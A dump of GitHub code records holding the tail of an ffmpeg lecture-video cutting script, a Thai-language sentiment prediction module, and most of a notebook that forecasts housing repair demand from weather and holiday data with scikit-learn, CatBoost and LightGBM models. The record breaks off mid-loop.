cutItem[0]\n stopTime = cutItem[1]\n if stopTime == \"end\":\n streamV = stream.trim(start=startTime).setpts ('PTS-STARTPTS')\n streamA = stream.filter_('atrim', start = startTime).filter_('asetpts', 'PTS-STARTPTS')\n else:\n theDuration = (stopTime-startTime)+theSlateDuration\n streamV = stream.trim(start=startTime, duration=theDuration).setpts ('PTS-STARTPTS')\n streamA = stream.filter_('atrim', start = startTime, duration=theDuration).filter_('asetpts', 'PTS-STARTPTS')\n theConcatList.append(streamV)\n theConcatList.append(streamA)\n\n joinedStreams = ffmpeg.concat(*theConcatList, v=1, a=1).node\n theCandidateVideoPath = os.path.join(theCandidateVideoDir,theLectureName+\"-c.mp4\")\n stream = ffmpeg.output(joinedStreams[0], joinedStreams[1], theCandidateVideoPath).overwrite_output()\n print(ffmpeg.compile(stream))\n #sys.exit()\n ffmpeg.run(stream)\n\n\n\n\n # stream = ffmpeg.input(theVideoFileName)\n # theConcatList = []\n # ###Get the initial part\n # startTime = 0.0\n # stopTime = cutList[0][0] #start time of the first element\n # theDuration = stopTime-startTime\n # streamV = stream.trim(start=startTime, duration=theDuration).setpts ('PTS-STARTPTS')\n # streamA = stream.filter_('atrim', start = startTime, duration=theDuration).filter_('asetpts', 'PTS-STARTPTS')\n # theConcatList.append(streamV)\n # theConcatList.append(streamA)\n # ################\n # i = 0\n # theLength = len(cutList)\n # for cutItem in cutList:\n # i = i+1\n # if i< theLength:\n # startTime = stopTime\n # stopTime = cutList[i][0]\n # theDuration = stopTime-startTime\n # ##############\n # streamV = stream.trim(start=startTime, duration=theDuration).setpts ('PTS-STARTPTS')\n # streamA = stream.filter_('atrim', start = startTime, duration=theDuration).filter_('asetpts', 'PTS-STARTPTS')\n # theConcatList.append(streamV)\n # theConcatList.append(streamA)\n # ##############\n # print(startTime+theDuration)\n # ###This includes the final chunk\n # startTime = cutList[-1][1] #stop time of the last element\n # startTime = startTime+theDuration\n # streamV = stream.trim(start=startTime).setpts ('PTS-STARTPTS')\n # streamA = stream.filter_('atrim', start = startTime).filter_('asetpts', 'PTS-STARTPTS')\n # theConcatList.append(streamV)\n # theConcatList.append(streamA)\n\n # print(theConcatList)\n\n\n # joinedStreams = ffmpeg.concat(*theConcatList, v=1, a=1).node\n\n # theCandidateVideoPath = os.path.join(theCandidateVideoDir,theLectureName+\"-c.mp4\")\n # stream = ffmpeg.output(joinedStreams[0], joinedStreams[1], theCandidateVideoPath).overwrite_output()\n # print(ffmpeg.compile(stream))\n # sys.exit()\n # print(\"****************\")\n # ffmpeg.run(stream)\n\n\n print(datetime.datetime.now() - timerStartTime)\n","repo_name":"seanth/Lecture-Demon","sub_path":"5-makeVideo.py","file_name":"5-makeVideo.py","file_ext":"py","file_size_in_byte":57468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5381708750","text":"import re\nimport pythainlp\nimport emoji\nimport pickle\nimport numpy as np\nimport os\n\nfrom pythainlp.corpus.common import thai_stopwords\nfrom keras.models import load_model\nfrom keras.utils import pad_sequences\n\nproject_dir = os.getcwd()\n\n# Construct the file path relative to the project directory\ntokenizer_path = os.path.join(project_dir, 'savedmodel', 'tokenizerTH.pickle')\nmodel_path = os.path.join(project_dir, 'savedmodel', 'sentiment_analysis_modelTH.h5')\n\n# Load the tokenizer and model\nwith open(tokenizer_path, 'rb') as handle:\n tokenizer = pickle.load(handle)\nmodel = load_model(model_path)\n\n# Define preprocess for Thai text\ndef preprocess_text(text):\n # tokenize the text\n text = emoji.demojize(text)\n text = \"\".join(u for u in text if u not in (\"?\", \".\", \";\", \":\", \"!\", '\"', \"ๆ\", \"ฯ\"))\n text = re.sub(r'[a-zA-Z]', '', text) # Remove English characters\n text = \" \".join(word for word in text)\n text = \"\".join(word for word in text.split() if word.lower() not in thai_stopwords())\n tokens = pythainlp.word_tokenize(str(text), engine='newmm')\n # join the tokens back into a single string\n text = \" \".join(tokens)\n # remove non-alphabetic characters and extra whitespaces\n text = re.sub('[^A-Za-zก-๙]+', ' ', text).strip()\n return text\n\ndef predictTH(new_text):\n new_text = preprocess_text(new_text)\n\n new_text = tokenizer.texts_to_sequences([new_text]) # Convert text to sequences of integers\n new_text = pad_sequences(new_text, maxlen=128)\n # Make the prediction\n prediction = model.predict(new_text)[0]\n\n # Get the predicted sentiment and confidence level\n sentiments = ['negative', 'neutral', 'positive']\n sentiment = sentiments[np.argmax(prediction)]\n confidence = round(float(np.max(prediction)), 2)\n percent = round(confidence * 100)\n\n return {'sentiment': sentiment, 'percentage': f'{percent}'}\n\ndef predictTextObjectTH(new_text):\n new_text = preprocess_text(new_text)\n\n new_text = tokenizer.texts_to_sequences([new_text]) # Convert text to sequences of integers\n new_text = pad_sequences(new_text, maxlen=128)\n # Make the prediction\n prediction = model.predict(new_text)[0]\n\n # Get the predicted sentiment and confidence level\n sentiments = ['negative', 'neutral', 'positive']\n sentiment = sentiments[np.argmax(prediction)]\n confidence = round(float(np.max(prediction)), 2)\n percent = round(confidence * 100)\n\n return sentiment, f'{percent}'","repo_name":"Notties/Sentiment-Analysis-Model","sub_path":"deploy/modelTH.py","file_name":"modelTH.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7932700312","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### Loading neccessary libraries\n\n# In[1]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport plotly.express as px\nfrom datetime import date\nimport holidays\nfrom datetime import datetime, timedelta\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom catboost import CatBoostClassifier\nfrom lightgbm import LGBMClassifier\nfrom sklearn.metrics import accuracy_score, f1_score, roc_auc_score, mean_squared_error, recall_score, r2_score, classification_report\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom lightgbm import LGBMRegressor\nfrom catboost import CatBoostRegressor\nfrom sklearn.preprocessing import OneHotEncoder\nfrom imblearn.over_sampling import SMOTE\nfrom scipy import stats\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LinearRegression, Lasso, ElasticNet\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom lightgbm import LGBMRegressor\nfrom catboost import CatBoostRegressor\nimport shap\nimport joblib\nfrom sklearn.base import clone\n\n\n# In[2]:\n\n\n# getting uk holiday dates (for holiday varaible needed to execute this project objective - one of the potential predictors)\nuk_holidays = holidays.UnitedKingdom()\n# print all the holidays in UnitedKingdom in year 2023 for demonstration purpose\nfor ptr in holidays.UnitedKingdom(years = 2023).items():\n print(ptr)\n\n\n# #### Loading datasets needed to execute this project objective\n\n# In[3]:\n\n\njob = pd.read_excel(r'..\\UPDATED DATA\\04. Repairs\\Job.xlsx')\npty_codes = pd.read_excel(r'..\\UPDATED DATA\\04. Repairs\\Pty.xlsx')\nsor = pd.read_excel(r'..\\UPDATED DATA\\04. Repairs\\SORTrd.xlsx')\n# weather data in Gloucester from 27 Feb 1996 to 15 June 2023\ngl = pd.read_excel(r'..\\UPDATED DATA\\Weather Data\\Gloucester.xlsx')\n# weather codes from WMO - for states of sky - CLOUDY, CLEAR, RAIN, LIGHT DRIZZLE, SNOW etc\nwmo = pd.read_csv(r'..\\UPDATED DATA\\wmo_codes.csv', header = None)\n\n\n# ##### Merging job with priority type and replacing old SOR Trade codes with new ones\n\n# In[4]:\n\n\npty_type = pty_codes[['pty_cde','pty_type']]\njob['job_report_date'] = pd.to_datetime(job['reported-dat']).dt.date\njob = job.merge(pty_type, how='left', left_on='pty-cde', right_on='pty_cde')\n# mapping priority code of each report with priority classifcation of repair (routine, cyclic, emergency, void)\npty_map = dict(pty_codes[['pty_cde','pty_classification']].values)\njob['priority'] = job['pty-cde'].map(pty_map)\n# droppin pty_cde column \njob.drop('pty_cde', axis = 1, inplace = True)\n# replacing OLD SOR trade codes with NEW ones\njob['sortrd-cde-1'].replace(['BR', 'C', 'E', 'E1', 'F', 'G','GF', 'H', 'MI', 'P', 'PD', 'PO','R', 'SC', 'TI', 'W'], \n ['0B','0C','0E', '0E', '0F','0Z','0G','HP','NS','0P', '0D','0D','0R', '0S', '0I','0C'], \n inplace=True)\n# mapping SOR Trade codes to their descriptions\nsor.set_index('cde', inplace = True)\nsor_map = sor.to_dict()['dsc']\njob['sor'] = job['sortrd-cde-1'].map(sor_map)\njob.head()\n\n\n# #### Calculating number of 'report counts' for each date in the dataframe\n\n# In[5]:\n\n\njob1 = job[['job_report_date', 'priority']]\njob_counts = job1.groupby(['job_report_date', 'priority']).size().reset_index(name='repair_count')\njob_counts = job_counts.iloc[1:]\njob_counts\n\n\n# ##### getting repair counts for each type of repair priority for each date\n\n# In[6]:\n\n\n# converting job_report_date to datetime\njob_counts['job_report_date'] = pd.to_datetime(job_counts['job_report_date'])\n# defining the date range\nstart_date = pd.to_datetime('1996-02-27')\nend_date = pd.to_datetime('2023-06-15')\ndate_range = pd.date_range(start=start_date, end=end_date)\n\n# creating a DataFrame with all date-priority combinations\npriorities = ['Emergency Repair', 'Inspection', 'Other', 'Routine Repair', 'Void Works', 'Planned Work', 'Cyclical Works']\ndate_priority_combinations = []\nfor date in date_range:\n for priority in priorities:\n date_priority_combinations.append({'job_report_date': date, 'priority': priority})\n\nall_combinations_df = pd.DataFrame(date_priority_combinations)\n# merging the original job_counts DataFrame with all_combinations_df\nall_job_comb = pd.merge(all_combinations_df, job_counts, on=['job_report_date', 'priority'], how='left')\n\n# filling NaN values in repair_count with 0\nall_job_comb['repair_count'].fillna(0, inplace=True)\nall_job_comb\n\n\n# In[7]:\n\n\nall_jobs = all_job_comb[['job_report_date', 'priority', 'repair_count']]\n\nall_jobs['Year'] = pd.to_datetime(all_jobs['job_report_date']).dt.year\nall_jobs['Week'] = pd.to_datetime(all_jobs['job_report_date']).dt.week\nall_jobs['Month'] = pd.to_datetime(all_jobs['job_report_date']).dt.month\nall_jobs['Day'] = pd.to_datetime(all_jobs['job_report_date']).dt.day\n\nall_jobs['WeekDay'] = pd.to_datetime(all_jobs['job_report_date']).dt.dayofweek\nall_jobs['Holiday'] = all_jobs['job_report_date'].isin(uk_holidays)\nall_jobs['BeginMonth']=all_jobs.Day.isin([1,2,3]).astype(int)\nall_jobs['Weekend']=all_jobs.WeekDay.isin([5,6]).astype(int)\n\nall_jobs.head()\n\n\n# ### Merging with weather data\n\n# ##### Mapping weather codes to Gloucester weather data\n\n# In[8]:\n\n\n# getting wmo codes (weather condition)\nwmo.drop(0, axis = 1, inplace = True)\nwmo.columns = ['description', 'weather condition']\nmy_weather_map = wmo['weather condition']\ngl['weather_condition'] = gl['weathercode (wmo code)'].map(my_weather_map)\n# gloucester weather data\ngl = gl.reindex(columns=['time', 'weathercode (wmo code)', 'weather_condition','temperature_2m_max (°C)',\n 'temperature_2m_min (°C)', 'temperature_2m_mean (°C)',\n 'apparent_temperature_max (°C)', 'apparent_temperature_min (°C)',\n 'apparent_temperature_mean (°C)', 'shortwave_radiation_sum (MJ/m²)',\n 'precipitation_sum (mm)', 'rain_sum (mm)', 'snowfall_sum (cm)',\n 'precipitation_hours (h)', 'windspeed_10m_max (km/h)',\n 'windgusts_10m_max (km/h)', 'winddirection_10m_dominant (°)', ])\n\n\n# ###### WMO code = 2 means that the weather at present is the same as last recorded weather (today is same as yesterday since this is daily weather data)\n# Replace 2 with previous weather condition\n\n# In[9]:\n\n\n# first replacing 2 with NaN, then filling NaN in the weather condition column with the value of the preceding row \nmodified_weather_codes = gl[['weathercode (wmo code)', 'weather_condition']]\nmodified_weather_codes[modified_weather_codes['weathercode (wmo code)']==2] = np.NaN\n# modified_weather_codes\nmodified_weather_codes1 = modified_weather_codes.fillna(method='ffill')\nmodified_weather_codes1.columns = ['weathercode (wmo code) modified','weather_condition modified']\n#modified_weather_codes1\ngl_modified = pd.concat([gl, modified_weather_codes1], axis = 1)\ngl_modified = gl_modified.reindex(columns=['time', 'weathercode (wmo code)', 'weather_condition', \n 'weathercode (wmo code) modified', 'weather_condition modified',\n 'temperature_2m_max (°C)',\n 'temperature_2m_min (°C)', 'temperature_2m_mean (°C)',\n 'apparent_temperature_max (°C)', 'apparent_temperature_min (°C)',\n 'apparent_temperature_mean (°C)', 'shortwave_radiation_sum (MJ/m²)',\n 'precipitation_sum (mm)', 'rain_sum (mm)', 'snowfall_sum (cm)',\n 'precipitation_hours (h)', 'windspeed_10m_max (km/h)',\n 'windgusts_10m_max (km/h)', 'winddirection_10m_dominant (°)', ])\n\n\ngl_updated = gl_modified[['time', 'weathercode (wmo code) modified', 'weather_condition modified',\n 'temperature_2m_max (°C)',\n 'temperature_2m_min (°C)', 'temperature_2m_mean (°C)',\n 'apparent_temperature_max (°C)', 'apparent_temperature_min (°C)',\n 'apparent_temperature_mean (°C)', 'shortwave_radiation_sum (MJ/m²)',\n 'precipitation_sum (mm)', 'rain_sum (mm)', 'snowfall_sum (cm)',\n 'precipitation_hours (h)', 'windspeed_10m_max (km/h)',\n 'windgusts_10m_max (km/h)', 'winddirection_10m_dominant (°)', ]]\ngl_updated\n\n\n# #### Merge weather dataframe to mainframe. Join on common date column, so we have weather info as well as repair count for each date\n\n# In[10]:\n\n\n# converting DATE values in WEATHER dataset to DATETIME type for easy merging with REPAIR dataset\ngl_updated.time = gl_updated.time.apply(lambda x: x.date())\ngl_updated['time'] = pd.to_datetime(gl_updated['time'])\njob_unique_date_weather = all_jobs.merge(gl_updated, how='inner', left_on='job_report_date', right_on='time')\n\n# dropping numerical weather code and only keeping corresponding textual code to later encode\njob_unique_date_weather = job_unique_date_weather.drop('weathercode (wmo code) modified', axis = 1)\n\n# making Boolean value into integer\njob_unique_date_weather['Holiday'] = job_unique_date_weather['Holiday'].apply(int) \njob_unique_date_weather\n\n\n# #### Isolating data for each repair priority type\n\n# In[11]:\n\n\nroutine = job_unique_date_weather[job_unique_date_weather['priority']=='Routine Repair']\nemergency = job_unique_date_weather[job_unique_date_weather['priority']=='Emergency Repair']\nvoid = job_unique_date_weather[job_unique_date_weather['priority']=='Void Works']\nplanned = job_unique_date_weather[job_unique_date_weather['priority']=='Planned Work']\ncyclical = job_unique_date_weather[job_unique_date_weather['priority']=='Cyclical Works']\nother = job_unique_date_weather[job_unique_date_weather['priority']=='Other']\ninspection = job_unique_date_weather[job_unique_date_weather['priority']=='Inspection']\n\n\n# #### Checking for missing values\n\n# In[12]:\n\n\nfor feature in all_jobs.columns.values:\n print('#####', feature, '-----number missing', all_jobs[feature].isnull().sum())\n \n \n\n\n# NO MISSING VALUES\n\n# ### Experiment - Using Classifiers for predicting demand for each priority type\n\n# In[13]:\n\n\n# loading all priority datasets\ndatasets = {\n 'routine': routine, \n 'emergency': emergency,\n 'void': void,\n 'other': other,\n 'cyclical': cyclical,\n 'inspection': inspection,\n 'planned': planned\n}\n\n# declaring classifiers to be used\nclassifiers = {\n 'Decision Tree': DecisionTreeClassifier(random_state=42),\n 'Random Forest': RandomForestClassifier(random_state=42),\n 'CatBoost': CatBoostClassifier(random_state=42, verbose=0),\n 'LightGBM': LGBMClassifier(random_state=42)\n}\n\n# list for stroing performance metrics\nall_metrics = []\n\n# iterating over each dataset\nfor dataset_name, dataset in datasets.items():\n print(f'Training classifiers for dataset: {dataset_name}')\n \n # predictors and target\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count']\n\n # splitting data into training and testing sets\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # storing performance scores of each classifier for current dataset\n dataset_metrics = []\n\n # iterating over classifiers, train, predict, and calculate metrics\n for name, classifier in classifiers.items():\n classifier.fit(x_train, y_train)\n y_pred = classifier.predict(x_cv)\n accuracy = accuracy_score(y_cv, y_pred)\n f1 = f1_score(y_cv, y_pred, average='weighted')\n f1_macro = f1_score(y_cv, y_pred, average='macro')\n rmse = np.sqrt(mean_squared_error(y_cv, y_pred))\n recall = recall_score(y_cv, y_pred, average='weighted', zero_division=1)\n\n dataset_metrics.append({'Classifier': name, 'Accuracy': accuracy, 'F1 Score': f1, 'F1 Macro':f1_macro, 'RMSE': rmse, 'Recall': recall})\n\n # storing metrics for this dataset\n all_metrics.extend([(dataset_name, metrics) for metrics in dataset_metrics])\n\n\n# In[14]:\n\n\nall_metrics\n\n\n# In[15]:\n\n\n# creating lists to store performance metrics of all classifiers for all priority types\ndatasets = []\nclassifiers = []\naccuracies = []\nf1_scores = []\nf1_macro = []\nrmse_scores = []\nrecalls = []\n\n# iterating over all_metrics and getting corresponding performance metrics of all classifiers for all priority types\nfor dataset, metrics in all_metrics:\n datasets.append(dataset)\n classifiers.append(metrics['Classifier'])\n accuracies.append(metrics['Accuracy'])\n f1_scores.append(metrics['F1 Score'])\n f1_macro.append(metrics['F1 Macro'])\n rmse_scores.append(metrics['RMSE'])\n recalls.append(metrics['Recall'])\n\n# final dataframe\nmetrics_df = pd.DataFrame({\n 'Dataset': datasets,\n 'Classifier': classifiers,\n 'Accuracy': accuracies,\n 'F1 Score': f1_scores,\n 'F1 Macro': f1_macro,\n 'RMSE': rmse_scores,\n 'Recall': recalls\n})\n\n\nmetrics_df\n\n\n# In[16]:\n\n\n# sorting the metrics by accuracy\nsorted_metrics_df = metrics_df.sort_values(by='Accuracy')\n\n# get metrics of each classifier\nall_classifier_scores = sorted_metrics_df.groupby('Classifier')\n\n# plotting accuracy and F1 score for each type of classifier (trained on each priority dataset)\nfor classifier, classifier_scores in all_classifier_scores:\n plt.figure(figsize=(10, 6))\n plt.title(f'{classifier} - Accuracy and F1 Score')\n plt.xlabel('Dataset')\n plt.ylabel('Score')\n plt.xticks(rotation=45)\n\n plt.plot(classifier_scores['Dataset'], classifier_scores['Accuracy'], label='Accuracy', marker='o')\n plt.plot(classifier_scores['Dataset'], classifier_scores['F1 Score'], label='F1 Score', marker='o')\n\n plt.legend()\n plt.tight_layout()\n plt.show()\n\n\n# #### Identify best classifier\n\n# In[17]:\n\n\n# grouping the dataframe by 'Classifier' and calculating mean accuracy for each classifier\nclassifier_accuracy = metrics_df.groupby('Classifier')['Accuracy'].mean()\nclassifier_f1_macro = metrics_df.groupby('Classifier')['F1 Macro'].mean()\n\n# classifier with the highest mean accuracy\nbest_classifier = classifier_accuracy.idxmax()\nhighest_accuracy = classifier_accuracy.max()\nhighest_f1_macro = classifier_f1_macro.max()\n\nprint(f\"The best performing classifier is '{best_classifier}' with an average accuracy of {highest_accuracy:.6f} with an average accuracy of {highest_accuracy:.6f} and highest F1 Macro Score of {highest_f1_macro:.6f}\")\n\n\n# In[18]:\n\n\nbest_classifier_scores = metrics_df[metrics_df['Classifier'] == 'CatBoost']\nbest_classifier_scores = best_classifier_scores.sort_values(by = 'Accuracy', ascending = False)\nbest_classifier_scores\n\n\n# In[19]:\n\n\ncatboost_classifier_scores = metrics_df[metrics_df['Classifier'] == 'CatBoost']\ncatboost_classifier_scores = catboost_classifier_scores.sort_values(by = 'Accuracy', ascending = False)\nplt.figure(figsize=(10, 6))\nplt.title(f'CatBoost Classifier - Accuracy')\nplt.xlabel('Dataset')\nplt.ylabel('Score')\nplt.xticks(rotation=45)\n\nplt.plot(catboost_classifier_scores['Dataset'], catboost_classifier_scores['Accuracy'], label='Accuracy', marker='o')\nplt.plot(catboost_classifier_scores['Dataset'], catboost_classifier_scores['F1 Macro'], label='F1 Macro', marker='o')\n\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# #### Oversampling\n\n# In[21]:\n\n\n# loading all datasets and classifiers for training \n# subsequently evalauting each classifier's performance for each priority dataset\ndatasets = {\n 'routine': routine, \n 'emergency': emergency,\n 'void': void,\n 'other': other,\n 'cyclical': cyclical,\n 'inspection': inspection,\n 'planned': planned\n}\n\nclassifiers = {\n 'Decision Tree': DecisionTreeClassifier(random_state=42),\n 'Random Forest': RandomForestClassifier(random_state=42),\n 'CatBoost': CatBoostClassifier(random_state=42, verbose=0),\n 'LightGBM': LGBMClassifier(random_state=42)\n}\n\nall_metrics_smt = []\n\n# iterating over each dataset\nfor dataset_name, dataset in datasets.items():\n print(f'Training classifiers for dataset: {dataset_name}')\n \n \n \n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count'] \n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n \n # dropping repair count values which have instances lower than minimum number of neigbours needed to create synthetic datapoints using SMOTE\n repair_count_counts = y_train.value_counts()\n values_to_drop = repair_count_counts[repair_count_counts < 10].index.tolist()\n x_train_filtered = x_train[~y_train.isin(values_to_drop)]\n y_train_filtered = y_train[~y_train.isin(values_to_drop)]\n \n # resampling training data using SMOTE\n oversample = SMOTE()\n resampled_X, resampled_y = oversample.fit_resample(x_train_filtered, y_train_filtered) \n \n # list to store metrics for each classifier for current dataset (with resampled data)\n dataset_metrics = []\n\n # iterating over classifiers, train, predict, and calculating metrics\n for name, classifier in classifiers.items():\n classifier.fit(resampled_X, resampled_y)\n y_pred = classifier.predict(x_cv)\n accuracy = accuracy_score(y_cv, y_pred)\n f1 = f1_score(y_cv, y_pred, average='weighted')\n f1_macro = f1_score(y_cv, y_pred, average='macro')\n rmse = np.sqrt(mean_squared_error(y_cv, y_pred))\n recall = recall_score(y_cv, y_pred, average='weighted', zero_division=1)\n dataset_metrics.append({'Classifier': name, 'Accuracy': accuracy, 'F1 Score': f1, 'F1 Macro':f1_macro, 'RMSE': rmse, 'Recall': recall})\n\n # storing metrics for current dataset\n all_metrics_smt.extend([(dataset_name, metrics) for metrics in dataset_metrics])\n\n\n# In[22]:\n\n\n# storing performance metrics of each classifier for each oversampled priority type dataset\ndatasets = []\nclassifiers = []\naccuracies = []\nf1_scores = []\nf1_macro = []\nrmse_scores = []\nrecalls = []\n\nfor dataset, metrics in all_metrics_smt:\n datasets.append(dataset)\n classifiers.append(metrics['Classifier'])\n accuracies.append(metrics['Accuracy'])\n f1_scores.append(metrics['F1 Score'])\n f1_macro.append(metrics['F1 Macro'])\n rmse_scores.append(metrics['RMSE'])\n recalls.append(metrics['Recall'])\n\nmetrics_smote_df = pd.DataFrame({\n 'Dataset': datasets,\n 'Classifier': classifiers,\n 'Accuracy': accuracies,\n 'F1 Score': f1_scores,\n 'F1 Macro': f1_macro,\n 'RMSE': rmse_scores,\n 'Recall': recalls\n})\n\n\nmetrics_smote_df\n\n\n# In[25]:\n\n\n# identifying best classifier (after SMOTEing)\nclassifier_accuracy = metrics_smote_df.groupby('Classifier')['Accuracy'].mean()\nclassifier_f1_macro = metrics_smote_df.groupby('Classifier')['F1 Macro'].mean()\n\n# finding classifier with the highest mean accuracy\nbest_classifier = classifier_accuracy.idxmax()\nhighest_accuracy = classifier_accuracy.max()\nhighest_f1_macro = classifier_f1_macro.max()\n\nprint(f'The best performing classifier after oversampling with SMOTE is \\'{best_classifier}\\' with an average accuracy of {highest_accuracy:.6f} and highest F1 Macro Score of {highest_f1_macro:.6f}')\n\n\n# In[26]:\n\n\nbest_resampled_classifier_scores = metrics_smote_df[metrics_smote_df['Classifier'] == 'Random Forest']\nbest_resampled_classifier_scores = best_resampled_classifier_scores.sort_values(by = 'Accuracy', ascending = False)\nbest_resampled_classifier_scores\n\n\n# In[27]:\n\n\ncat_smt_classifier_scores = metrics_smote_df[metrics_smote_df['Classifier'] == 'Random Forest']\ncat_smt_classifier_scores = cat_smt_classifier_scores.sort_values(by = 'Accuracy', ascending = False)\nplt.figure(figsize=(10, 6))\nplt.title(f'CatBoost Classifier on Resampled data')\nplt.xlabel('Dataset')\nplt.ylabel('Score')\nplt.xticks(rotation=45)\n\nplt.plot(cat_smt_classifier_scores['Dataset'], cat_smt_classifier_scores['Accuracy'], label='Accuracy', marker='o')\nplt.plot(cat_smt_classifier_scores['Dataset'], cat_smt_classifier_scores['F1 Macro'], label='F1 Macro', marker='o')\n\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# #### Conclusion: no significant improvement after oversampling. F1 Macro score remains equal to 0.44\n\n# ##### Retraining classifiers and storing predictions\n\n# In[28]:\n\n\ndatasets = {\n 'routine': routine, \n 'emergency': emergency,\n 'void': void,\n 'other': other,\n 'cyclical': cyclical,\n 'inspection': inspection,\n 'planned': planned\n}\n\n\n# dictionary to store predicted values and actual repair count values for each dataset\npredictions_dict = {}\n\n# iterating over each dataset\nfor dataset_name, dataset in datasets.items():\n print(f'Retraining CatBoost Classifier for dataset: {dataset_name}')\n\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count']\n \n # splitting data into train and test sets\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # retraining the best classifier\n catboost = CatBoostClassifier(random_state=42, silent = True)\n catboost.fit(x_train, y_train)\n \n # predictions on test data\n y_pred = catboost.predict(x_cv)\n \n # savng predicted values and actual values in the dictionary\n predictions_dict[dataset_name] = {'Actual': y_cv, 'Predicted': y_pred}\n\n\n# In[29]:\n\n\n# check predicting performance of classifiers\n# creating scatter plot for randomly selecting datapoints (actual vs predicted repair count)\nnum_samples = 500\n\n# Iterate over each dataset\nfor dataset_name, predictions in predictions_dict.items():\n actual_values = predictions['Actual']\n predicted_values = predictions['Predicted']\n \n # Reset indices of the actual_values DataFrame\n actual_values = actual_values.reset_index(drop=True)\n \n # Randomly sample data points for plotting\n max_samples = min(len(actual_values), num_samples) # Limit samples to available data length\n sample_indices = random.sample(range(len(actual_values)), max_samples)\n sampled_actual = [actual_values[i] for i in sample_indices]\n sampled_predicted = [predicted_values[i] for i in sample_indices]\n \n # Create a scatter plot of sampled actual vs predicted values\n plt.figure(figsize=(8, 6))\n plt.scatter(sampled_actual, sampled_predicted, color='blue', alpha=0.5)\n plt.title(f'Sampled Actual vs Predicted for {dataset_name} Dataset')\n plt.xlabel('Actual Values')\n plt.ylabel('Predicted Values')\n plt.xlim(min(sampled_actual), max(sampled_actual))\n plt.ylim(min(sampled_predicted), max(sampled_predicted))\n plt.plot([min(sampled_actual), max(sampled_actual)], [min(sampled_actual), max(sampled_actual)], color='red', linestyle='--', linewidth=2)\n plt.tight_layout()\n plt.show()\n\n\n# In[30]:\n\n\n# get classification report for CatBoost classifier trained on each priority dataset\n# iterating over each dataset\nfor dataset_name, predictions in predictions_dict.items():\n actual_values = predictions['Actual']\n predicted_values = predictions['Predicted']\n \n # classification report\n cls_report = classification_report(actual_values, predicted_values)\n \n print(f'Classification Report for {dataset_name} Dataset:\\n')\n print(cls_report)\n\n\n# ### Experiment - Using Regressors for predicting demand for each priority type\n# ##### Training models without normalization/standardization of numeric features. Only encoding categorical features\n\n# #### Creating copies of datasets for each priority type for regression, and applying log-transformation on repair counts (target)\n\n# Transforming target 'repair_count' for better regression over extreme values/ outlier values of repair count\n# \n\n# In[31]:\n\n\npd.set_option('display.max_rows', None)\n\n\n# In[32]:\n\n\ncyclical_reg = cyclical.copy()\nplanned_reg = planned.copy()\nroutine_reg = routine.copy()\nother_reg = other.copy()\nemergency_reg = emergency.copy()\nvoid_reg = void.copy()\ninspection_reg = inspection.copy()\n\n\n# applying log transformation to repair_count for each dataset\ncyclical_reg['repair_count'] = np.log1p(cyclical_reg['repair_count'])\nplanned_reg['repair_count'] = np.log1p(planned_reg['repair_count'])\nroutine_reg['repair_count'] = np.log1p(routine_reg['repair_count'])\nother_reg['repair_count'] = np.log1p(other_reg['repair_count'])\nemergency_reg['repair_count'] = np.log1p(emergency_reg['repair_count'])\nvoid_reg['repair_count'] = np.log1p(void_reg['repair_count'])\ninspection_reg['repair_count'] = np.log1p(inspection_reg['repair_count'])\n\n\n# In[33]:\n\n\n# datasets for regression corresponding to each priority type: routine, emergency, planned, cyclical, void, inspection, other\n# log Transformed datasets\ndatasets = [routine_reg, emergency_reg, planned_reg, cyclical_reg, void_reg, inspection_reg, other_reg]\n\nscores = []\n# list of regressors to experiment with\nregressors = [\n LinearRegression,\n KNeighborsRegressor,\n RandomForestRegressor,\n Lasso,\n ElasticNet,\n GradientBoostingRegressor,\n LGBMRegressor,\n CatBoostRegressor\n]\n\n# list of metrics to calculate for evaluating regressors\nmetrics = {\n 'MSE': mean_squared_error,\n 'R2': r2_score,\n}\n\n# creating dataFrame to store scores\nscores_df = pd.DataFrame(columns=['Method', 'Dataset'] + list(metrics.keys()))\n\n# iterating over regressors\nfor regressor in regressors:\n for dataset_name, dataset in zip(['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other'], datasets):\n print(f'Training {regressor.__name__} on {dataset_name}')\n\n # prediciting features and target\n 